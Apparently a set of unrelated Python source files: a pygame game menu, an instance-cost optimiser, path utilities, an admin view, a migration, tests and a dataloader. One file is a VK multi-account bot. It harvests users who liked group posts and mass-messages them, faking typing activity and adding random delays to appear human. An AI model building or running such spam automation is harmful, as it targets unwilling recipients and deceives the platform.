self.current_screen = Menu.TRACK_SELECT
if new_track:
new_index = self.library.add_track(new_track)
self.save_library()
if new_index is not None:
self.track_selection_index = new_index
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.render_selected_tracks()
self.render_selected_track_data()
return
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_DOWN:
label_selection_index = min(3, label_selection_index + 1)
break
elif event.key == pygame.K_UP:
label_selection_index = max(0, label_selection_index - 1)
break
if self.redraw_screen:
self.screen.fill((0, 0, 0))
new_track_file_text = self.generic_font.render('Paste filepath from clipboard', True,
Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE)
new_track_file_text_box = new_track_file_text.get_rect()
new_track_file_text_box.center = self.width / 2, 200
self.screen.blit(new_track_file_text, new_track_file_text_box)
clipboard = paste()
new_track_clipboard_text = self.small_font.render(f'Clipboard: {clipboard}', True, Menu.WHITE)
self.screen.blit(new_track_clipboard_text, (10, self.height - 200))
self.screen.blit(self.new_track_edit, (15, self.height - 30))
self.screen.blit(self.new_track_save, (self.width - 300, self.height - 30))
self.screen.blit(self.new_track_cancel, (self.width - 150, self.height - 30))
self.screen.blit(self.generic_font.render(f'Title: {new_track.title if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE), (10, 300))
self.screen.blit(self.generic_font.render(f'Artist: {new_track.artist if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE), (10, 375))
self.screen.blit(self.generic_font.render(f'Album: {new_track.album if new_track else "None"}', True, Menu.SELECTED_COLOR if label_selection_index == 3 else Menu.WHITE), (10, 450))
pygame.display.flip()
self.clock.tick(30)
def draw_edit_track(self):
label_selection_index = 0
track = self.selected_tracks[3]
old_title = track.title
old_artist = track.artist
old_album = track.album
while 1:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
if label_selection_index == 0:
track.set_title(paste())
break
elif label_selection_index == 1:
track.set_artist(paste())
break
elif label_selection_index == 2:
track.set_album(paste())
break
elif event.key == pygame.K_d:
track.delete_map()
self.library.remove_track(self.track_selection_index)
self.save_library()
if self.track_selection_index >= len(self.library.saved_tracks):
self.track_selection_index -= 1
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.render_selected_tracks()
self.render_selected_track_data()
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_s:
if track.title != old_title:
self.library.add_track(self.library.remove_track(self.track_selection_index))
self.save_library()
self.render_selected_tracks()
self.render_selected_track_data()
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_BACKSPACE:
track.set_title(old_title)
track.set_artist(old_artist)
track.set_album(old_album)
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_DOWN:
label_selection_index = min(2, label_selection_index + 1)
break
elif event.key == pygame.K_UP:
label_selection_index = max(0, label_selection_index - 1)
break
if self.redraw_screen:
self.screen.fill((0, 0, 0))
clipboard = paste()
edit_track_clipboard_text = self.small_font.render(f'Clipboard: {clipboard}', True, Menu.WHITE)
self.screen.blit(edit_track_clipboard_text, (10, self.height - 200))
self.screen.blit(self.new_track_edit, (15, self.height - 30))
self.screen.blit(self.edit_track_delete, (400, self.height - 30))
self.screen.blit(self.new_track_save, (self.width - 300, self.height - 30))
self.screen.blit(self.new_track_cancel, (self.width - 150, self.height - 30))
self.screen.blit(self.generic_font.render(f'Title: {track.title}', True, Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE), (10, 300))
self.screen.blit(self.generic_font.render(f'Artist: {track.artist}', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE), (10, 375))
self.screen.blit(self.generic_font.render(f'Album: {track.album}', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE), (10, 450))
pygame.display.flip()
self.clock.tick(30)
def draw_search(self):
pass
def display_loop(self):
while 1:
self.screen_calls[self.current_screen]()
if self.current_screen == 0:
break
def play_track(self, track):
if isfile(track.audio_filepath) and isfile(track.map_filepath):
self.audio_player.idle.wait()
enabled_layers_keys = {layer: key[1] for layer, key in self.layers_keys.items() if key[0]}
game = Game(self.screen, self.width, self.height, self.audio_player, track, enabled_layers_keys, self.preview_length, self.lenience, self.prune_unused_layers, self.latency, self.play_hit_sound, [self.bass_hit_sound_data, self.high_hit_sound_data])
game.start_game()
while game.restart:
self.audio_player.idle.wait()
game = Game(self.screen, self.width, self.height, self.audio_player, track, enabled_layers_keys, self.preview_length, self.lenience, self.prune_unused_layers, self.latency, self.play_hit_sound, [self.bass_hit_sound_data, self.high_hit_sound_data])
game.start_game()
self.save_library()
self.render_selected_track_data()
def save_library(self):
dump(self.library, open('library/saved.library', 'wb'))
def close_menu(self):
self.save_library()
self.audio_player.idle.wait()
self.audio_player.close()
pygame.display.quit()
| StarcoderdataPython |
1976590 | <gh_stars>1-10
import pandas as pd
from pulp import *
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
def best_reco(required_resources, instance_df):
prob = LpProblem("InstanceRecommender", LpMinimize)
instances = instance_df['name'].values
instance_dict = instance_df.set_index('name').T.to_dict()
instance_vars = LpVariable.dicts(
"Instance", instances, lowBound=0, cat='Integer')
prob += lpSum([instance_dict[i]['price'] * instance_vars[i]
for i in instances])
prob += lpSum([instance_dict[i]['vcpus'] * instance_vars[i]
for i in instances]) >= required_resources['vcpus']
prob += lpSum([instance_dict[i]['memory'] * instance_vars[i]
for i in instances]) >= required_resources['memory']
prob.solve()
print("Status:", LpStatus[prob.status])
best_reco = pd.DataFrame([
{'name': remove_prefix(v.name, "Instance_"), 'units': v.varValue}
for v in prob.variables() if v.varValue > 0]
)
best_reco = best_reco.merge(instance_df)
return best_reco
| StarcoderdataPython |
3465386 | import vk_api, time, random
from server_logout import Client_output, Logs
class Vk_accounts:
def read_file_token(file_name):
try:
file = open(file_name, 'r')
except:
file.close()
return None
list = []
for line in file.readlines():
token = line.split()[0]
try:
autoris = vk_api.VkApi(token= token)
vk = autoris.get_api()
info = vk.account.getProfileInfo()
list.append([token, info['first_name'], info['last_name'], info['id']])
vk.account.setOnline(voip = 0)
except:
pass
file.close()
return list
def write_file_token(file_name, token, list_adding, list, addr):
try:
file = open(file_name, 'a')
except FileNotFoundError:
file = open(file_name, 'w')
try:
for acc in list:
if token == acc[0]:
Client_output.message('ACCOUNT HAD ALREADY ADDED')
return None
except:
pass
try:
autoris = vk_api.VkApi(token= token)
vk = autoris.get_api()
info = vk.account.getProfileInfo()
vk.account.setOnline(voip = 0)
file.write(token+'\n')
file.close()
except Exception as e:
Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'write_file_token'])
if list_adding:
list.append([token, info['first_name'], info['last_name'], info['id']])
return list
def accounts_messages(account_list, num_of_messages, is_user_only, message_list):
for acc in account_list:
autoris = vk_api.VkApi(token= acc[0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
messages = vk.messages.getConversations(count = num_of_messages)
message_list = []
if is_user_only:
for message in messages.get('items'):
if message.get('conversation').get('peer').get('type') == 'user':
message_list.append(message.get('conversation').get('peer').get('id'))
else:
for message in messages.get('items'):
message_list.append(message.get('conversation').get('peer').get('id'))
def accounts_groups(account_list, num_of_groups, group_list):
#for acc in account_list:
autoris = vk_api.VkApi(token= account_list[0][0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
groups = vk.groups.get(user_id = account_list[0][3], extended = 1, count = num_of_groups)
group_list =[]
for group in groups.get('items'):
group_list.append([group.get('id'),group.get('name')])
return group_list
def group_posts(account_list, group_ids, num_of_posts, post_list, newest = False):
for id in group_ids:
autoris = vk_api.VkApi(token= account_list[0][0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
posts = vk.wall.get(owner_id = '-'+str(id), count = num_of_posts, filter = 'owner')
buffer_post = []
post_list = []
if newest:
buffer_post = [posts.get('items')[0].get('id'), posts.get('items')[0].get('date')]
if buffer_post[0][1] < posts.get('items')[1].get('date') and num_of_posts > 1:
buffer_post = [posts.get('items')[1].get('id'), posts.get('items')[1].get('date')]
else:
for post in posts.get('items'):
buffer_post.append([post.get('id'),post.get('date')])
post_list.append([buffer_post, id])
return post_list
def likes(account_list, post_list, user_id, unquie_users = True, protected_id = 0):
for posts in post_list:
for post in posts[0]:
autoris = vk_api.VkApi(token= account_list[0][0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
likes = vk.likes.getList(type = 'post', owner_id = '-'+str(posts[1]), item_id = post[0], extended = 0, count = 1000, skip_own = 1)
user_id = []
try:
if unquie_users:
user_id.append(likes.get('items')[0])
for like in likes.get('items'):
if like in user_id:
pass
else:
user_id.append(like)
try:
for id in user_id:
if vk.groups.isMember(group_id = '-'+str(protected_id), user_id = str(id)):
user_id.remove(id)
except:
pass
else:
for like in likes.get('items'):
user_id.append(like)
except:
pass
return user_id
def send_messages(account_list, like_list, message, count, sleep_time = 5, only_new = True, message_list = list()):
if only_new :
for like in like_list:
if like in message_list:
like_list.remove(like)
mes = 0
send_mes = 0
while send_mes < count:
for acc in account_list:
autoris = vk_api.VkApi(token= acc[0])
vk = autoris.get_api()
try:
vk.account.setOnline(voip = 0)
vk.messages.setActivity(user_id = like_list[mes], type = 'typing')
time.sleep(random.randint(0,10))
vk.messages.send(user_id = like_list[mes], message = message, random_id = random.randint(1, 32000))
send_mes += 1
Logs.user_list(like_list[mes])
except Exception as e:
Logs.user_list(like_list[mes], Succes = False, error = e)
time.sleep(sleep_time)
mes += 1
if send_mes == count:
break
if(send_mes >= 20 * len(account_list)):
break
def post_on_wall(account_info, group_id):
autoris = vk_api.VkApi(token = account_info[0])
vk = autoris.get_api()
try:
vk.account.setOnline(voip = 0)
group_posts = vk.wall.get(owner_id = '-'+str(group_id), count = 10, filter = 'owner')
posts_ids = []
for id in group_posts.get('items'):
posts_ids.append(id.get('id'))
user_posts = vk.wall.get(owner_id = str(account_info[3]), count = 100)
for id in user_posts.get('items'):
if id.get('id') in posts_ids:
posts_ids.remove(id.get('id'))
vk.wall.repost(object = 'wall-{0}_{1}'.format(str(group_id), str(posts_ids[random.randint(0,len(posts_ids))])))
except Exception as e:
Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'post_on_wall'])
def send_to_friend(account_list, account_info, send_post = False, message = '', group_id = 0 ):
autoris = vk_api.VkApi(token = account_info[0])
vk = autoris.get_api()
if send_post:
vk.account.setOnline(voip = 0)
group_posts = vk.wall.get(owner_id = '-'+str(group_id), count = 10, filter = 'owner')
posts_ids = []
for id in group_posts.get('items'):
posts_ids.append(id.get('id'))
while True:
friend_id = account_list[random.randint(0, len(account_list)-1)][3]
if friend_id == account_info[3]:
pass
else:
vk.account.setOnline(voip = 0)
if send_post:
print(str(friend_id))
vk.messages.setActivity(user_id = str(friend_id), type = 'typing')
time.sleep(random.randint(0,10))
vk.messages.send(user_id = str(friend_id), message = message, attachment = 'wall-{0}_{1}'.format(str(group_id), str(posts_ids[random.randint(0,len(posts_ids))])), random_id = random.randint(1, 32000))
else:
vk.messages.send(user_id = str(friend_id), message = message, random_id = random.randint(1, 32000))
break
def set_like(account_info, group_id , post_id):
try:
autoris = vk_api.VkApi(token = account_info[0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
vk.likes.add(owner_id = '-'+str(group_id), item_id = str(post_id), type = 'post')
except Exception as e:
Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'set_like'])
def answer_on_message(account_list, account_info, latency = 5, message = ''):
#try:
autoris = vk_api.VkApi(token = account_info[0])
vk = autoris.get_api()
vk.account.setOnline(voip = 0)
messages = vk.messages.getConversations(count = 25, filter = 'unread', extended = 1)
for mes in messages.get('items'):
try:
if mes.get('last_message').get('attachments')[0].get('type') != 'wall':
messages.get('items').remove(mes)
except:
messages.get('items').remove(mes)
for mes in messages.get('items'):
for acc in account_list:
if acc[3] == mes.get('conversation').get('peer').get('id'):
time.sleep(latency)
vk.account.setOnline(voip = 0)
vk.messages.markAsRead(start_message_id = mes.get('conversation').get('last_message_id'))
vk.messages.setActivity(user_id = acc[3], type = 'typing')
time.sleep(random.randint(0,10))
vk.messages.send(user_id = acc[3], message = message, random_id = random.randint(1, 500000))
if messages == [] or messages == None:
Client_output.message("THERE IS NO ANY MESSAGE")
#except Exception as e:
# Logs.log_write('Got an error: '+str(e), ['Vk_logic', 'answer_on_message'])
| StarcoderdataPython |
3254020 | <filename>src/pyenv_inspect/path.py
from __future__ import annotations
import os
from pathlib import Path
from .exceptions import PathError
def get_pyenv_root() -> Path:
try:
pyenv_root = Path(os.environ['PYENV_ROOT']).resolve()
except KeyError:
pyenv_root = Path.home() / '.pyenv'
if not pyenv_root.exists():
raise PathError(f'pyenv root does not exist: {pyenv_root}')
if not pyenv_root.is_dir():
raise PathError(f'pyenv root is not a directory: {pyenv_root}')
return pyenv_root
def get_pyenv_versions_directory() -> Path:
pyenv_root = get_pyenv_root()
versions_dir = (pyenv_root / 'versions').resolve()
if not versions_dir.exists():
raise PathError(f'pyenv versions path does not exist: {versions_dir}')
if not versions_dir.is_dir():
raise PathError(
f'pyenv versions path is not a directory: {versions_dir}')
return versions_dir
def get_pyenv_python_executable_path(version_dir: Path) -> Path:
exec_path = (version_dir / 'bin' / 'python').resolve()
if not exec_path.exists():
raise PathError(f'pyenv python binary does not exist: {exec_path}')
if not exec_path.is_file():
raise PathError(f'pyenv python binary is not a file: {exec_path}')
if not os.access(exec_path, os.X_OK):
raise PathError(f'pyenv python binary is not executable: {exec_path}')
return exec_path
| StarcoderdataPython |
6590636 | <filename>invenio_userprofiles/admin.py<gh_stars>1-10
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Admin views for invenio-userprofiles."""
from __future__ import absolute_import, print_function
from flask_admin.contrib.sqla import ModelView
from .models import UserProfile
def _(x):
"""Identity."""
return x
class UserProfileView(ModelView):
"""Userprofiles view. Links User ID to user/full/display name."""
can_view_details = True
can_create = False
can_delete = False
column_list = (
'user_id',
'_displayname',
'full_name',
)
column_searchable_list = \
column_filters = \
column_details_list = \
columns_sortable_list = \
column_list
form_columns = ('username', 'full_name')
column_labels = {
'_displayname': _('Username'),
}
user_profile_adminview = {
'model': UserProfile,
'modelview': UserProfileView,
'category': _('User Management'),
}
| StarcoderdataPython |
3319135 | # Generated by Django 3.1.1 on 2020-11-20 17:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('report', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='report',
name='reportfile',
field=models.FileField(blank=True, null=True, upload_to='reports/', verbose_name=''),
),
]
| StarcoderdataPython |
1691647 | <filename>tests/analysis/test_label.py
import os
import numpy as np
import pandas as pd
import pytest
import trackintel as ti
from trackintel.analysis.labelling import _check_categories
class TestCreate_activity_flag:
"""Tests for create_activity_flag() method."""
def test_create_activity_flag(self):
"""Test if 'activity' = True is assigned to staypoints."""
sp_file = os.path.join("tests", "data", "geolife", "geolife_staypoints.csv")
sp_test = ti.read_staypoints_csv(sp_file, tz="utc", index_col="id")
activity_true = sp_test["activity"].copy()
sp_test["activity"] = False
sp_test = sp_test.as_staypoints.create_activity_flag(method="time_threshold", time_threshold=5.0)
pd.testing.assert_series_equal(sp_test["activity"], activity_true)
def test_wrong_input_parameter(self):
"""Test if an error will be raised when input wrong method."""
sp_file = os.path.join("tests", "data", "geolife", "geolife_staypoints.csv")
sp_test = ti.read_staypoints_csv(sp_file, tz="utc", index_col="id")
method = 12345
with pytest.raises(AttributeError, match=f"Method {method} not known for creating activity flag."):
sp_test.as_staypoints.create_activity_flag(method=method)
method = "random"
with pytest.raises(AttributeError, match=f"Method {method} not known for creating activity flag."):
sp_test.as_staypoints.create_activity_flag(method=method)
class TestPredict_transport_mode:
"""Tests for predict_transport_mode() method."""
def test_wrong_input_parameter(self):
"""Test if an error will be raised when input wrong method."""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
method = 12345
with pytest.raises(AttributeError, match=f"Method {method} not known for predicting tripleg transport modes."):
tpls.as_triplegs.predict_transport_mode(method=method)
method = "random"
with pytest.raises(AttributeError, match=f"Method {method} not known for predicting tripleg transport modes."):
tpls.as_triplegs.predict_transport_mode(method=method)
def test_check_empty_dataframe(self):
"""Assert that the method does not work for empty DataFrames."""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
empty_frame = tpls[0:0]
with pytest.raises(AssertionError):
empty_frame.as_triplegs.predict_transport_mode(method="simple-coarse")
def test_simple_coarse_identification_no_crs(self):
"""
Assert that the simple-coarse transport mode identification throws the correct
warning and and yields the correct results for WGS84.
"""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
with pytest.warns(
UserWarning,
match="The CRS of your data is not defined.",
):
tpls_transport_mode = tpls.as_triplegs.predict_transport_mode(method="simple-coarse")
assert tpls_transport_mode.iloc[0]["mode"] == "slow_mobility"
assert tpls_transport_mode.iloc[1]["mode"] == "motorized_mobility"
assert tpls_transport_mode.iloc[2]["mode"] == "fast_mobility"
def test_simple_coarse_identification_wgs_84(self):
"""Asserts the correct behaviour with data in wgs84."""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
tpls_2 = tpls.set_crs(epsg=4326)
tpls_transport_mode_2 = tpls_2.as_triplegs.predict_transport_mode(method="simple-coarse")
assert tpls_transport_mode_2.iloc[0]["mode"] == "slow_mobility"
assert tpls_transport_mode_2.iloc[1]["mode"] == "motorized_mobility"
assert tpls_transport_mode_2.iloc[2]["mode"] == "fast_mobility"
def test_simple_coarse_identification_projected(self):
"""Asserts the correct behaviour with data in projected coordinate systems."""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
tpls_2 = tpls.set_crs(epsg=4326)
tpls_3 = tpls_2.to_crs(epsg=2056)
tpls_transport_mode_3 = tpls_3.as_triplegs.predict_transport_mode(method="simple-coarse")
assert tpls_transport_mode_3.iloc[0]["mode"] == "slow_mobility"
assert tpls_transport_mode_3.iloc[1]["mode"] == "motorized_mobility"
assert tpls_transport_mode_3.iloc[2]["mode"] == "fast_mobility"
def test_check_categories(self):
"""Asserts the correct identification of valid category dictionaries."""
tpls_file = os.path.join("tests", "data", "triplegs_transport_mode_identification.csv")
tpls = ti.read_triplegs_csv(tpls_file, sep=";", index_col="id")
correct_dict = {2: "cat1", 7: "cat2", np.inf: "cat3"}
assert _check_categories(correct_dict)
with pytest.raises(ValueError):
incorrect_dict = {10: "cat1", 5: "cat2", np.inf: "cat3"}
tpls.as_triplegs.predict_transport_mode(method="simple-coarse", categories=incorrect_dict)
| StarcoderdataPython |
3591521 | <filename>dataloaders/dataloader_triplet.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 28 16:05:38 2019
- Dataloader for triplet of graph-data.
- trainset only includes ids that has valid positive-pairs (iou > threshold.) e.g. 0.6
- randomly sample anchors [same as previous]
- for selected anchor, find an positive from positive set (randomly choose if multiple exits)
- To find the negative,
1) randomly choose any image except from the pos list
2) only choose images whose iou is beteen some range (l_iou, h_iou) --> (0.2-0.4)
The higher the iou the harder is the negative.
3) Only choose hard examples just below the postive threshold, and above some iou e.g. (0.4-0.7))
@author: dipu
"""
import torch
from torch.utils.data import Dataset
import torch.utils.data as data
import os
from PIL import Image
from torchvision import transforms
import numpy as np
import random
import pickle
import torch.nn.functional as F
from collections import defaultdict
import random
def default_loader(path):
return Image.open(path).convert('RGB')
def pickle_save(fname, data):
with open(fname, 'wb') as pf:
pickle.dump(data, pf)
print('Saved to {}.'.format(fname))
def pickle_load(fname):
with open(fname, 'rb') as pf:
data = pickle.load(pf)
print('Loaded {}.'.format(fname))
return data
#%%
class PSGraphTripletDataset(Dataset):
def default_loader(path):
return Image.open(path).convert('RGB')
def reset_iterator(self):
del self._prefetch_process
self._prefetch_process = BlobFetcher(self, if_shuffle = (self.split=='train'))
# self._prefetch_process = BlobFetcher(self, if_shuffle=True)
self.iterator = 0
def __init__(self, sg_geometry_path, det_feats_path, batch_size=16, split='train', use_box_feats=True, use_neg_anchor=True):
random.seed(7)
self.split = split
self.batch_size = batch_size
self.loader = default_loader # for img loading, using PIL
self.geometry_relation = True
self.use_box_feats = use_box_feats
self.use_neg_anchor = use_neg_anchor # whether to sample negs as anchors too
# setup retrieving det feats
self.det_feats_path = det_feats_path # det feats
# # detection feats, keys = paths (so need to convert idx to path)
# use detection feats organized by img, which is output from cal_geo_feats
# dict of dicts
self.det_feats = pickle.load(open(self.det_feats_path, 'rb'))
# setup getting built geo graph
self.sg_geometry_dir = sg_geometry_path # geo graph built
print('\nLoading detection feats from dir: {}\n'.format(self.det_feats_path))
print('\nLoading geo graphs from dir: {}\n'.format(self.sg_geometry_dir))
self.geom_feat_size = 8
# get paths, put in list
self.idx2path = list(self.det_feats.keys())
self.path2idx = self.get_idx_by_path() # a dict
self.idxs = [i for i in range(len(self.idx2path))]
# ** I have another way of getting apn. He uses in just get_pairs(),
self.iterator = 0
print('Assigned %d images to split %s'%(len(self.idx2path), split))
# only shuffle if train set
self._prefetch_process = BlobFetcher(self, self.split=='train', num_workers=4)
def cleanup():
print('Terminating BlobFetcher')
del self._prefetch_process
import atexit
atexit.register(cleanup)
def __len__(self):
''' Used by the _prefetch_process() to work properly '''
return len(self.det_feats)
def __getitem__(self, index):
'''
Used by the _prefetch_process() to work properly
'''
# print('get item called {}:'.format(index))
sg_data = self.get_full_graph_by_idx(index)
return [sg_data, index] # does it have to be a tuple?
def get_idx_by_path(self):
''' key = path, val = idx '''
idx_by_path = {}
for idx, path in enumerate(self.idx2path):
idx_by_path[path] = idx
return idx_by_path
def _get_geo_graph_by_idx(self, index):
# get the geo graph data
sg_geo_dir = self.sg_geometry_dir
sample_rel_path = self.idx2path[index] # relative path, used for key look up
sg_geo_path = os.path.join(sg_geo_dir, sample_rel_path) + '.npy' # need to add ext
rela = np.load(sg_geo_path, allow_pickle=True)[()] # dict contains keys of edges and feats
return rela
def _get_det_feats_by_idx(self, index):
path = self.idx2path[index] # relative path, used for key look up
det_feats = self.det_feats[path]
return det_feats
def get_full_graph_by_idx(self, index):
# retieve geo graph
rela = self._get_geo_graph_by_idx(index)
# retrieve visual feats
det_feats = self._get_det_feats_by_idx(index)
visual_feats = det_feats['visual']
box = det_feats['box'] # in xyxy format, changed from xywh format
obj_count = det_feats['obj_count']
obj_count = np.reshape(obj_count, (-1, 1)) # make a N x 1 vector
# print('obj_count reshaped', obj_count)
if self.use_box_feats:
box_feats = self.get_box_feats(det_feats)
sg_data = {'visual': visual_feats, 'box_feats': box_feats, 'rela': rela, 'box': box}
else:
sg_data = {'visual': visual_feats, 'rela': rela, 'box':box}
return sg_data
def get_box_feats(self, det_feats):
''' uses the detection feats to calc the box feats'''
# full image shape
H, W, _ = det_feats['hwc'].astype(float)
x1, y1, x2, y2 = np.hsplit(det_feats['box'].astype(float), 4)
w = x2-x1
h = y2-y1
box_feats = np.hstack((0.5 * (x1 + x2) / W, 0.5 * (y1 + y2) / H, w/W, h/H, w*h/(W*H)))
#box_feats = box_feat / np.linalg.norm(box_feats, 2, 1, keepdims=True)
return box_feats
def get_triplet(self, q_path):
'''
Given path of a query, build the triplet
Labels are in the path, which will tell us how to choose negs and pos
format: 0000/pos_2kaq0r_00.jpg, -> subdir/pos_img_id.ext, or subdir/neg_img_id.ext
'''
img_nums_per_label = 4 # per label
# parse q path
q_subdir, q_file = q_path.split('/')
q_label, q_img_name, q_img_num = q_file.split('_')
q_img_num = int(q_img_num)
# set anchor positive no matter what
if not self.use_neg_anchor:
if q_label == 'neg':
n_path = q_path # neg is the anchor
# sample 2 diff numbers for img nums to be a and p
a_num, p_num = np.random.choice(img_nums_per_label, 2, replace=False)
# build up anchor path
a_file_name = '_'.join(['pos', q_img_name, str(a_num).zfill(2)])
a_path = os.path.join(q_subdir, a_file_name)
# build up pos path
p_file_name = '_'.join(['pos', q_img_name, str(p_num).zfill(2)])
p_path = os.path.join(q_subdir, p_file_name)
else: # q label is pos
a_path = q_path
# find a different pos
nums = [i for i in range(img_nums_per_label)]
n_num = np.random.choice(nums) # can be same as query num, since diff label
# # sample a diff number for img nums to be p, exclude the query
# p_num = np.random.choice(nums.remove(q_img_num))
nums.remove(q_img_num)
p_num = np.random.choice(nums)
# build up anchor path
p_file_name = '_'.join(['pos', q_img_name, str(p_num).zfill(2)])
p_path = os.path.join(q_subdir, p_file_name)
# build up pos path
n_file_name = '_'.join(['neg', q_img_name, str(n_num).zfill(2)])
n_path = os.path.join(q_subdir, n_file_name)
# allow neg anchor
else:
# same = is same label as anchor
# diff = diff label than anchor
# num_idx = 0-49
# just use whatever the query path is as the anchor (neg or pos)
a_path = q_path
# selecting a random num idx
nums = [i for i in range(img_nums_per_label)]
diff_num = np.random.choice(nums)
nums.remove(q_img_num)
same_num = np.random.choice(nums)
# get the right name
if q_label == 'pos':
same_label = 'pos'
diff_label = 'neg'
else:
diff_label = 'pos'
same_label = 'neg'
# build up same path
same_file_name = '_'.join([same_label, q_img_name, str(same_num).zfill(2)])
same_path = os.path.join(q_subdir, same_file_name)
# build up diff path
diff_file_name = '_'.join([diff_label, q_img_name, str(diff_num).zfill(2)])
diff_path = os.path.join(q_subdir, diff_file_name)
p_path = same_path
n_path = diff_path
return a_path, p_path, n_path
def get_batch(self, batch_size=None):
batch_size = batch_size or self.batch_size
sg_batch_a = []
sg_batch_p = []
sg_batch_n = []
infos = []
wrapped = False # represents one full epoch use of the dataloader
for i in range(batch_size):
# fetches a sample randomly, can be a photoshop version as anchor. handles multiple epochs by shuffling
tmp_sg_a, idx_a, tmp_wrapped = self._prefetch_process.get()
path_a = self.idx2path[idx_a]
# based on what is returned, find the pos and neg versions
a_path, p_path, n_path = self.get_triplet(path_a)
a_idx, p_idx, n_idx = self.path2idx[a_path], self.path2idx[p_path], self.path2idx[n_path]
# retrieve the graphs
graph_a = self.get_full_graph_by_idx(a_idx)
graph_p = self.get_full_graph_by_idx(p_idx)
graph_n = self.get_full_graph_by_idx(n_idx)
sg_batch_a.append(graph_a)
sg_batch_p.append(graph_p)
sg_batch_n.append(graph_n)
# record associated info as well
info_dict = {}
info_dict['ix_a'] = idx_a
info_dict['a_path'] = a_path
info_dict['p_path'] = p_path
info_dict['n_path'] = n_path
infos.append(info_dict)
if tmp_wrapped:
wrapped = True
break
data = {}
# find max number of objects in an image across each batch
max_box_len_a = max([_['visual'].shape[0] for _ in sg_batch_a])
max_box_len_p = max([_['visual'].shape[0] for _ in sg_batch_p])
max_box_len_n = max([_['visual'].shape[0] for _ in sg_batch_n])
# print('max_box_len_a: ', max_box_len_a)
# print('max_box_len_p: ', max_box_len_p)
# print('max_box_len_n: ', max_box_len_n)
# just meta data on the batch
data['bounds'] = {'it_pos_now': self.iterator, 'it_max': len(self.idx2path), 'wrapped': wrapped}
data['infos'] = infos # a/p/n paths and idxs used in batch
data['sg_data_a'] = self.batch_sg(sg_batch_a, max_box_len_a)
data['sg_data_p'] = self.batch_sg(sg_batch_p, max_box_len_p)
data['sg_data_n'] = self.batch_sg(sg_batch_n, max_box_len_n)
return data
def batch_sg(self, sg_batch, max_box_len):
"batching object, attribute, and relationship data"
rela_batch = [_['rela'] for _ in sg_batch]
box_batch = [_['box'] for _ in sg_batch]
visual_batch = [_['visual'] for _ in sg_batch]
sg_data = {}
# visual feats, shape: (B, max_box_len, 128)
sg_data['visual'] = np.zeros([len(visual_batch), max_box_len, visual_batch[0].shape[1]], dtype = 'float32')
for i in range(len(visual_batch)):
# for ith sample, set all up to its num of objects
sg_data['visual'][i, :visual_batch[i].shape[0]] = visual_batch[i]
sg_data['visual_masks'] = np.zeros(sg_data['visual'].shape[:2], dtype='float32')
for i in range(len(visual_batch)):
sg_data['visual_masks'][i, :visual_batch[i].shape[0]] = 1
sg_data['obj_boxes'] = np.zeros([len(box_batch), max_box_len, 4], dtype = 'float32')
for i in range(len(box_batch)):
sg_data['obj_boxes'][i, :len(box_batch[i])] = box_batch[i]
if self.use_box_feats:
box_feats_batch = [_['box_feats'] for _ in sg_batch]
sg_data['box_feats'] = np.zeros([len(box_feats_batch), max_box_len, 5], dtype = 'float32')
for i in range(len(box_feats_batch)):
sg_data['box_feats'][i, :len(box_feats_batch[i])] = box_feats_batch[i]
# rela
max_rela_len = max([_['edges'].shape[0] for _ in rela_batch])
sg_data['rela_edges'] = np.zeros([len(rela_batch), max_rela_len, 2], dtype = 'int')
if self.geometry_relation:
sg_data['rela_feats'] = np.zeros([len(rela_batch), max_rela_len, self.geom_feat_size], dtype = 'float32')
else:
sg_data['rela_feats'] = np.zeros([len(rela_batch), max_rela_len], dtype='int')
# rela_masks, because not all items in rela_edges and rela_feats are meaningful
sg_data['rela_masks'] = np.zeros(sg_data['rela_edges'].shape[:2], dtype='float32')
for i in range(len(rela_batch)):
sg_data['rela_edges'][i, :rela_batch[i]['edges'].shape[0]] = rela_batch[i]['edges']
sg_data['rela_feats'][i, :rela_batch[i]['edges'].shape[0]] = rela_batch[i]['feats']
sg_data['rela_masks'][i, :rela_batch[i]['edges'].shape[0]] = 1
return sg_data
#%%
class BlobFetcher():
"""Experimental class for prefetching blobs in a separate process."""
